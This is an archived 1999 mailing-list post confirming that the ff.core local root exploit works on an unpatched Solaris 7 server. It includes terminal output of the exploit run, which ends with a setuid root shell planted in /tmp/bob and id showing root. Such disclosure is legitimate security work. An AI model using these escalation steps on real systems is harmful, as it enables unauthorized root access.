Greetings, Confirmed ff.core exploit does exist in Solaris 7, server edition. System is straight installation, no patches of any category available for 7 from Sunsolve yet. Daniel (12:32,99-01-08) (dfrasnel@rogue)[~]> uname -spr SunOS 5.7 sparc (12:34,99-01-08) (dfrasnel@rogue)[~]> ./test Testing if exploit is possible... Test successful. Proceeding... Backing up clobbered files to /tmp/.bk Doing sploit... Done with sploit. Testing and trying to clean up now... Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. Connection closed by foreign host. w00p! Should have a suid root sh in /tmp/bob btw, its rksh because solaris is silly Let me try to clean up my mess... everything should be cool.. i think :> # ls -la /tmp/bob -rwsr-xr-x 1 root root 192764 Jan 8 12:32 /tmp/bob # id (snip) euid=0(root)
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:28:14 PDT